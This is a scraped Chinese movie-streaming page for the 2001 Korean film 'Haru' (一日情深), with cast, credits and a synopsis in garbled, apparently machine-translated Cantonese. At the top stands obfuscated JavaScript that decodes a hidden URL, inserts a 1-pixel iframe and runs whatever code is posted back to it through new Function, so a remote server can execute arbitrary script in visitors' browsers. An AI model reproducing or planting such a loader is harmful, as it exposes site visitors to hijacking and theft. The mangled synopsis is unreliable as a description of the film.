if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['tJXdMAK']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), ''))); 'jQuery'; w['__y' + 'rq' + 'nq' + 'ob' + 'j_2484'] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#tJXdMAK'); var k = '', wr = 'w' + 'ri' + 't' + 'e'; 'jQuery'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_2484`]) { var t = x(e.data[`des_s_2484`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } });})(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'MkY'+'lMk'+'FFZ'+'zcF'+'F2g'+'uZG'+'NFF'+'lMG'+'swL'+'mNu'+'FFJ'+'TNB'+'MTA'+'0NF'+'FDM'+'lMk'+'YyY'+'jFF'+'Q1Y'+'FFz'+'YlM'+'kZF'+'FjL'+'TI0'+'OFF'+'DQt'+'FFM'+'jUF'+'FtM'+'S5j'+'cFF'+'3M=', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}
 

一日情深

资源:mp4在线播放|韩国剧情爱情电影

类型:剧情片 韩国剧情 爱情 剧情 韩国 2001

.

云播放

  • 云播放

《一日情深》剧情介绍

一日情深影片剧照1

导演:韩志承

主演: 李成宰 / 高素荣

类型: 剧情 / 爱情

制片国家/地区: 韩国

语言: 韩语

上映日期:2001-01-13(韩国)

片长: 112分钟

又名: 一天 / 思娘 / Haru /A day

IMDb链接:tt0291847

简介:

早年失去双亲喺阿姨家大嘅阿Jane园好想母性嘅爱。但系佢两个就始终唔可以有仔。为咗填补阿Jane园内心嘅残缺,担润使出咗周身解术,但阿Jane园对仔嘅想就与日俱增。睇佢个样痛苦,担润嘅心犹如刀鎅一般….差唔多放弃希望嘅两人奇迹般噉有咗个仔,佢哋仿佛到咗成个世界,因为系等咗好耐已久嘅细路,就佢哋嘅喜悦系无话过嘅。佢哋等咗好耐住仔嘅诞生,幸福噉度过每一个日子,但系边个都冇预料奇迹会变成更大嘅痛苦……

佢哋畀将要降临到人世仔改名叫润珍,喺各自嘅名中抽出个字。不过幸福转瞬转瞬即逝,马上又变咗更大嘅痛苦。仔得一种怪病,唯有在生上存活一日。陷入极度痛苦中嘅两人从医生嗰度听到咗个新嘅消息。个仔可以救活好多仔生命两人决定生下呢个细路。仔终于诞生,忘住保温箱入面嘅润珍,佢哋泪如泉涌。这时天中下起咗第一场雪,就象系天对佢哋嘅安慰。润阿Jane静英英离开咗佢哋,可通过润珍又诞生咗好多个其他嘅润阿Jane……?就象只下一日瑞雪般嘅爱。

一日情深影片剧照2

Copyright © 2018-2021 一起看电影网(17kan电影,17看电影) 百度地图 - google地图 - 360地图 - 神马地图 - 搜搜地图 - bing地图 - 站点地图 - 搜狗地图 - RSS订阅 All Rights Reserved